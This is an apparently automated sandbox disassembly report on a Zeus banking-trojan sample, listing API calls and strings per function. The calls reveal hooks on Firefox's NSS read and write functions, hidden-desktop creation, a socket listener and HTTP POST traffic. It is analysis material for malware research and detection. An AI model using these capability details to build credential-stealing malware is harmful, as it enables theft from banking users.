Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,004120A9), ref: 0040C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,004120A9), ref: 0040C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040C14C

Part of subcall function 0040BE3B: VirtualAllocEx.KERNEL32(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0040C160,00422360), ref: 0040BE72

Part of subcall function 0041B58C: InitializeCriticalSection.KERNEL32(00423FE4,76C61857,0040C185,00422360), ref: 0041B5A2
Part of subcall function 0041B58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041B5DE
Part of subcall function 0041B58C: GetProcAddress.KERNEL32(PR_SetError), ref: 0041B5F0
Part of subcall function 0041B58C: GetProcAddress.KERNEL32(PR_GetError), ref: 0041B602

Strings

PR_Write, xrefs: 0040C141
PR_OpenTCPSocket, xrefs: 0040C11F
PR_Read, xrefs: 0040C134
nss3.dll, xrefs: 0040C10C
PR_Close, xrefs: 0040C127

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BC103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,003C20A9), ref: 003BC111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,003C20A9), ref: 003BC125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 003BC132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 003BC13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 003BC14C

Part of subcall function 003BBE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,003BC160,003D2360), ref: 003BBE72

Part of subcall function 003CB58C: InitializeCriticalSection.KERNEL32(003D3FE4,76C61857,003BC185,003D2360), ref: 003CB5A2
Part of subcall function 003CB58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 003CB5DE
Part of subcall function 003CB58C: GetProcAddress.KERNEL32(PR_SetError), ref: 003CB5F0
Part of subcall function 003CB58C: GetProcAddress.KERNEL32(PR_GetError), ref: 003CB602

Strings

PR_Read, xrefs: 003BC134
nss3.dll, xrefs: 003BC10C
PR_OpenTCPSocket, xrefs: 003BC11F
PR_Write, xrefs: 003BC141
PR_Close, xrefs: 003BC127

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041BD7B, Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 247

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

EnterCriticalSection.KERNEL32(00423FE4), ref: 0041BDB7
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041BDE5
EnterCriticalSection.KERNEL32(00423FE4), ref: 0041BE09

Part of subcall function 004114C3: InternetCrackUrlA.WININET ref: 004117AC
Part of subcall function 004114C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004117CA
Part of subcall function 004114C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 004118E4
Part of subcall function 004114C3: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411910
Part of subcall function 004114C3: LeaveCriticalSection.KERNEL32(00422AC8,?,?), ref: 0041194D

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Part of subcall function 0041835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 004183B8

Part of subcall function 004140F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0041410D

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

LeaveCriticalSection.KERNEL32(00423FE4,00000000,?,00000000), ref: 0041C04C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C06B
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C078

Strings

%x, xrefs: 0041BF11
Content-Length, xrefs: 0041BF55
?B, xrefs: 0041BFB7
?B, xrefs: 0041BDB1
0, xrefs: 0041BF31

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00405C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 0040DCA2: GetClassNameW.USER32(76FC8F97,?,00000101), ref: 0040DCBD

GetWindowThreadProcessId.USER32(?,?), ref: 00405CB4
ResetEvent.KERNEL32(00000010), ref: 00405D03
PostMessageW.USER32(?,?,?,00000010), ref: 00405D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00405D35

Part of subcall function 00405B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 00405B40
Part of subcall function 00405B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00405B9A
Part of subcall function 00405B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405BD6
Part of subcall function 00405B28: TerminateProcess.KERNEL32(?,00000000), ref: 00405BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 00405D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00405D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00405DA7

Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DD9
Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DE2

IntersectRect.USER32(?,?), ref: 00405DC7
FillRect.USER32(?,?,00000006), ref: 00405DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00405DED

Part of subcall function 00417A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00417AB5

Part of subcall function 00416B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00412E87,?,19367401,?,00000001,8889347B,00000002), ref: 00416BA9
Part of subcall function 00416B9E: CloseHandle.KERNEL32(00000000), ref: 00416BB4

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B5C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 003BDCA2: GetClassNameW.USER32(003E01CA,?,00000101), ref: 003BDCBD

GetWindowThreadProcessId.USER32(?,?), ref: 003B5CB4
ResetEvent.KERNEL32(00000010), ref: 003B5D03
PostMessageW.USER32(?,?,?,00000010), ref: 003B5D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 003B5D35

Part of subcall function 003B5B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 003B5B40
Part of subcall function 003B5B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 003B5B9A
Part of subcall function 003B5B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 003B5BD6
Part of subcall function 003B5B28: TerminateProcess.KERNEL32(?,00000000), ref: 003B5BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 003B5D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 003B5D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 003B5D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 003B5DA7

Part of subcall function 003C4DCA: CloseHandle.KERNEL32(00000000), ref: 003C4DD9
Part of subcall function 003C4DCA: CloseHandle.KERNEL32(00000000), ref: 003C4DE2

IntersectRect.USER32(?,?), ref: 003B5DC7
FillRect.USER32(?,?,00000006), ref: 003B5DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 003B5DED

Part of subcall function 003C7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 003C7AB5

Part of subcall function 003C6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,003C2E87,?,19367401,?,00000001,8889347B,00000002), ref: 003C6BA9
Part of subcall function 003C6B9E: CloseHandle.KERNEL32(00000000), ref: 003C6BB4

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 00417AF0: WindowFromPoint.USER32(?,?), ref: 00417B0C
Part of subcall function 00417AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00417B3D
Part of subcall function 00417AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 00417B61
Part of subcall function 00417AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00417B72
Part of subcall function 00417AF0: GetWindowLongW.USER32(?,000000F0), ref: 00417B8F
Part of subcall function 00417AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00417B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 0040B6B6
GetParent.USER32(00000000), ref: 0040B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B6FD
IsWindow.USER32(?), ref: 0040B720

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

GetWindowInfo.USER32(00000000,?), ref: 0040B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0040B8AD

Part of subcall function 0040B31C: GetAncestor.USER32(?,00000002), ref: 0040B345
Part of subcall function 0040B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0040B370
Part of subcall function 0040B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 0040B3B2
Part of subcall function 0040B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B448
Part of subcall function 0040B31C: PostMessageW.USER32(?,00000112,?,?), ref: 0040B49B
Part of subcall function 0040B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B4DA

Part of subcall function 0040DCA2: GetClassNameW.USER32(76FC8F97,?,00000101), ref: 0040DCBD

Part of subcall function 0040B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B130
Part of subcall function 0040B11C: ReleaseMutex.KERNEL32(?), ref: 0040B14F
Part of subcall function 0040B11C: GetWindowRect.USER32(?,?), ref: 0040B15C
Part of subcall function 0040B11C: IsRectEmpty.USER32(?), ref: 0040B1E0
Part of subcall function 0040B11C: GetWindowLongW.USER32(?,000000F0), ref: 0040B1EF
Part of subcall function 0040B11C: GetParent.USER32(?), ref: 0040B205
Part of subcall function 0040B11C: MapWindowPoints.USER32(00000000,00000000), ref: 0040B20E
Part of subcall function 0040B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040B232

Strings

, xrefs: 0040B654
@, xrefs: 0040B806
<, xrefs: 0040B769

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BB5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 003C7AF0: WindowFromPoint.USER32(?,?), ref: 003C7B0C
Part of subcall function 003C7AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 003C7B3D
Part of subcall function 003C7AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 003C7B61
Part of subcall function 003C7AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C7B72
Part of subcall function 003C7AF0: GetWindowLongW.USER32(?,000000F0), ref: 003C7B8F
Part of subcall function 003C7AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C7B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 003BB6B6
GetParent.USER32(00000000), ref: 003BB6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 003BB6FD
IsWindow.USER32(?), ref: 003BB720

Part of subcall function 003BB0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 003BB0B3
Part of subcall function 003BB0AD: ReleaseMutex.KERNEL32(?), ref: 003BB0E7
Part of subcall function 003BB0AD: IsWindow.USER32(?), ref: 003BB0EE
Part of subcall function 003BB0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 003BB108
Part of subcall function 003BB0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 003BB110

GetWindowInfo.USER32(00000000,?), ref: 003BB770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 003BB8AD

Part of subcall function 003BB31C: GetAncestor.USER32(?,00000002), ref: 003BB345
Part of subcall function 003BB31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 003BB370
Part of subcall function 003BB31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 003BB3B2
Part of subcall function 003BB31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BB448
Part of subcall function 003BB31C: PostMessageW.USER32(?,00000112,?,?), ref: 003BB49B
Part of subcall function 003BB31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BB4DA

Part of subcall function 003BDCA2: GetClassNameW.USER32(003E01CA,?,00000101), ref: 003BDCBD

Part of subcall function 003BB11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 003BB130
Part of subcall function 003BB11C: ReleaseMutex.KERNEL32(?), ref: 003BB14F
Part of subcall function 003BB11C: GetWindowRect.USER32(?,?), ref: 003BB15C
Part of subcall function 003BB11C: IsRectEmpty.USER32(?), ref: 003BB1E0
Part of subcall function 003BB11C: GetWindowLongW.USER32(?,000000F0), ref: 003BB1EF
Part of subcall function 003BB11C: GetParent.USER32(?), ref: 003BB205
Part of subcall function 003BB11C: MapWindowPoints.USER32(00000000,00000000), ref: 003BB20E
Part of subcall function 003BB11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 003BB232

Strings

@, xrefs: 003BB806
, xrefs: 003BB654
<, xrefs: 003BB769

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00404DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 00412507: CreateMutexW.KERNELBASE(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 00404E28
CloseHandle.KERNEL32(?), ref: 00404F89

Part of subcall function 0040E959: CreateMutexW.KERNEL32(00422C30,00000000,00422A60,?,?,00404E69,?,?,?,743C152E,00000002), ref: 0040E97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00404EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 00404EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00404F1A

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 00414DF0: CreateThread.KERNEL32(00000000,?,00000000,0040748F,00000000,0040748F), ref: 00414E04
Part of subcall function 00414DF0: CloseHandle.KERNEL32(00000000), ref: 00414E0F

accept.WS2_32(?,00000000,00000000), ref: 00404F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 00404F59

Part of subcall function 0041675E: shutdown.WS2_32(00000000,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(00000000), ref: 0041676D

CloseHandle.KERNEL32(?), ref: 00404F7A

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Part of subcall function 0040E89E: RegOpenKeyExW.ADVAPI32(80000001,004229F8,00000000,00000001,?,?,76C605D7,00000000), ref: 0040E8E0

Part of subcall function 00404C68: getsockname.WS2_32(?,?,?), ref: 00404CBE
Part of subcall function 00404C68: CloseHandle.KERNEL32(?), ref: 00404CE2

Strings

K2w, xrefs: 00404EC7

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B4DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 003C2507: CreateMutexW.KERNEL32(003D2C30,00000000,?,?,?,?,?), ref: 003C2528

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 003B4E28
CloseHandle.KERNEL32(?), ref: 003B4F89

Part of subcall function 003BE959: CreateMutexW.KERNELBASE(003D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,003B4E69,?,?,?,743C152E,00000002), ref: 003BE97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 003B4EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 003B4EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 003B4F1A

Part of subcall function 003C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 003C67CC

Part of subcall function 003C4DF0: CreateThread.KERNEL32(00000000,?,00000000,003B748F,00000000,003B748F), ref: 003C4E04
Part of subcall function 003C4DF0: CloseHandle.KERNEL32(00000000), ref: 003C4E0F

accept.WS2_32(?,00000000,00000000), ref: 003B4F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 003B4F59

Part of subcall function 003C675E: shutdown.WS2_32(?,00000002), ref: 003C6766
Part of subcall function 003C675E: #3.WS2_32(?), ref: 003C676D

CloseHandle.KERNEL32(?), ref: 003B4F7A

Part of subcall function 003C6B8E: ReleaseMutex.KERNEL32(00000000,003C3021,?,?,?), ref: 003C6B92

Part of subcall function 003BE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 003BE8E0

Part of subcall function 003B4C68: getsockname.WS2_32(?,?,?), ref: 003B4CBE
Part of subcall function 003B4C68: CloseHandle.KERNEL32(?), ref: 003B4CE2

Strings

K2w, xrefs: 003B4EC7

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00418AE4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A

Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Strings

FsA, xrefs: 00418BF3
FsA, xrefs: 00418BBE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C50A3, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,003D2000,8404F700,00000000), ref: 003C50EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 003C5112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 003C5137
InternetCloseHandle.WININET(00000000), ref: 003C514F

Strings

Connection: close, xrefs: 003C5103, 003C5110
HTTP/1.1, xrefs: 003C50DF
POST, xrefs: 003C50C9
GET, xrefs: 003C50D0, 003C50E7
n><>F>, xrefs: 003C5137

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041D865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 0041D88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0041D89D
GetProcessWindowStation.USER32 ref: 0041D8AE

Part of subcall function 0041D83D: GetProcessWindowStation.USER32 ref: 0041D841
Part of subcall function 0041D83D: SetProcessWindowStation.USER32(00000000), ref: 0041D855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041D8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0041D8FD
GetCurrentThreadId.KERNEL32(?,?,?,0040731A,?,2937498D,?,00000000), ref: 0041D909
GetThreadDesktop.USER32(00000000), ref: 0041D910

Part of subcall function 0041D7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,0041D84D,00000000,?,?,?,0040731A,?,2937498D,?), ref: 0041D81D

SetThreadDesktop.USER32(00000000), ref: 0041D922
CloseDesktop.USER32(00000000), ref: 0041D934
CloseWindowStation.USER32(?), ref: 0041D94F

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 00412507: CreateMutexW.KERNELBASE(00422C30,00000000,?,?,?,?,?), ref: 00412528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 0040775B
SetThreadPriority.KERNEL32(00000000), ref: 00407762

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

WaitForSingleObject.KERNEL32(0000EA60), ref: 00407780

Part of subcall function 00419A9E: RegOpenKeyExW.ADVAPI32(80000001,00423EC0,00000000,00000001,?), ref: 00419ADD

CreateMutexW.KERNEL32(00422C30,00000001,?,20000000), ref: 00407843
GetLastError.KERNEL32 ref: 00407853
CloseHandle.KERNEL32(00000000), ref: 00407861

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Part of subcall function 00414DF0: CreateThread.KERNEL32(00000000,?,00000000,0040748F,00000000,0040748F), ref: 00414E04
Part of subcall function 00414DF0: CloseHandle.KERNEL32(00000000), ref: 00414E0F

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 00407919

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Strings

Global\%08X%08X%08X, xrefs: 0040781D

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 003C2507: CreateMutexW.KERNEL32(003D2C30,00000000,?,?,?,?,?), ref: 003C2528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 003B775B
SetThreadPriority.KERNEL32(00000000), ref: 003B7762

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

WaitForSingleObject.KERNEL32(0000EA60), ref: 003B7780

Part of subcall function 003C9A9E: RegOpenKeyExW.ADVAPI32(80000001,003D3EC0,00000000,00000001,?), ref: 003C9ADD

CreateMutexW.KERNEL32(003D2C30,00000001,?,20000000), ref: 003B7843
GetLastError.KERNEL32 ref: 003B7853
CloseHandle.KERNEL32(00000000), ref: 003B7861

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

Part of subcall function 003C4DF0: CreateThread.KERNEL32(00000000,?,00000000,003B748F,00000000,003B748F), ref: 003C4E04
Part of subcall function 003C4DF0: CloseHandle.KERNEL32(00000000), ref: 003C4E0F

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 003B7919

Part of subcall function 003C6B8E: ReleaseMutex.KERNEL32(00000000,003C3021,?,?,?), ref: 003C6B92

Strings

Global\%08X%08X%08X, xrefs: 003B781D

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041C912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 0041C929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D2A8), ref: 0041C955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C984
